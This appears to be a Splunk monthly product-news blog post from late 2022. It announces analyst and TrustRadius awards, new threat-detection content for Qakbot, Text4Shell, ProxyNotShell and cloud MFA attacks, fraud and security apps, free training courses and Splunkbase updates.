2022 Gartner Magic Quadrant for SIEM: Splunk Named a Leader for the 9th Year in a Row
Splunk is thrilled to announce that we have been named a Leader in the 2022 Gartner Magic Quadrant for Security Information and Event Management. Learn more about the innovations in Splunk Enterprise Security over the last 12 months in this blog or download the full report from Gartner here.
Detections & Analytics from the Splunk Threat Research Team
The Splunk Threat Research Team (STRT) has had two recent releases of security content in the Enterprise Security Content Update (ESCU) app. The most recent being v3.52.0, which includes 27 new detections and 4 new analytic stories. These detections are now available in Splunk Enterprise Security via the ESCU application update process or via Splunk Security Essentials (SSE).
Several new detection analytics that help you detect unusual activities that might relate to the Qakbot/QBot malware including parent-child process anomalies, persistence, initial access, recon and many more.
A new detection for Text4Shell (CVE-2022-42889), a new critical vulnerability similar to the old Spring4Shell and Log4Shell.
An advisory analytic story to assist defenders with CISA AA22-277A, which was recently released by the Cybersecurity and Infrastructure Security Agency (CISA) in response to an advanced persistent threat (APT) that utilized Impacket, an open-source toolkit, and other common techniques.
Updated content based on feedback and simulated attack data related to ProxyNotShell, which is a continuation of the ProxyShell saga but requires valid credentials.
Additional content for the Cloud Account Takeover use case with four new analytics that help detect attacks against Multi-factor Authentication (MFA) defense mechanisms for Amazon Web Services (AWS) console and 6 new analytic stories to help detect GCP Account Takeover.
The Splunk Threat Research Team also published the blog “Dark Crystal RAT Agent Deep Dive,” which highlights Splunk analytics developed for that Remote Access Trojan (RAT) to help you identify signs of compromise within your network.
Splunk App for Fraud Analytics
To help combat the continued rise in Fraud, the Splunk App for Fraud Analytics provides an anti-fraud solution that integrates with the detection and investigation power of Splunk Enterprise Security. Learn more about the app in our recent blog “Detect Fraud Sooner with the Splunk App for Fraud Analytics.”
InfoSec App for Splunk
Have you heard of the InfoSec App for Splunk? It can be used as your security starter pack to address some of the most common security use cases. Learn more in our recent blog “Splunk Security with the Infosec App.”
Federated Search for Security
Earlier this year, Splunk introduced Federated Search, which allows users to leverage Splunk search, alerting and dashboarding capabilities for data across multiple, disparate Splunk deployments. Federated Search can also be used to enable security use cases. Learn how you can make the most of Federated Search for security in this blog.
Splunk delivered a lot of great security information in the past month. In case you missed them, here are the on demand Tech Talks and webinars:
Achieving a comprehensive zero trust policy involves a range of integrated components and requires an ecosystem approach. Read our new white paper to learn how to align zero trust methodologies with AWS Services through Splunk’s ecosystem of applications.
Splunk Honored with Five TrustRadius Best Software Awards
Splunk got more great news this month, and we are excited to be the recipient of five “Best Software” awards from TrustRadius.
Splunk Enterprise Security (ES) won awards for Best Software for Enterprise, Best Software for Mid-Sized Businesses, and Best Software for Small Businesses.
Splunk SOAR won awards for Best Software for Enterprise, and Best Software for Mid-Sized Businesses.
To learn more about the TrustRadius awards, check out the blog. You can also leave your own review here.
Over 20 FREE eLearning Courses Help You Up-Skill with Splunk
Splunk can give you the superpowers you need to save the day. Our latest survey shows that the strongest superheroes up-skill with Splunk Education. That’s why we are making Splunk training easier and more accessible than ever with more than 20 self-paced, free eLearning courses.Start with foundational courses like Intro to Splunk or dive into more advanced courses like Search Under the Hood, Visualizations, and many more. Enroll today so you have the skills to detect the good, the bad, and the unproductive.
Oh, and you can stand out as a data superhero with Splunk swag! If you are one of the first 500 learners to completethree or more uniqueFREE eLearning Courses between 11/14/22 - 1/31/23, you’ll be entered into a drawing for a chance to win $100 to spend on Splunk t-shirts, socks, water bottles, and so much more! Terms and Conditions apply.
Ongoing Blog Series on OpenTelemetry: Use OpenTelemetry to Auto Instrument WordPress
OpenTelemetry is often associated with modern microservices and cloud-native applications. What happens if we apply OpenTelemetry and modern observability techniques to something completely different? WordPress is the world's most popular weblog software. And it's also an almost 20 years old monolith. What happens if we use OpenTelemetry auto tracing and the Splunk Observability cloud?
Imagine you are responsible for running WordPress sites. What insights can we bring with modern tools to a popular monolith? Just by instrumenting the environment, without any changes to the WordPress code.
The Lantern team are excited to announce that we have partnered with Splunk’s OnDemand Services team on a live chat feature to help you solve problems in real-time. The chat system connects you instantly to one of our OnDemand experts, who can help with the specifics of articles, as well as connect you to other ways you can get help.
This initial trial of our chat feature is only available until Friday, November 18, so hop onto Lantern today and test it out with your most urgent Splunk implementation questions.
Read about this and see all our latest articles in ourmonthly blog.
Find an App with Splunkbase
It’s been over a month since the newSplunkbasereleased as the default experience. Thanks for the supportive feedback you have given! We hope that in addition to using the improved search engine you are also following the Trending Apps on Splunkbase and the New Splunk Built and Supported Apps sections just down the home page.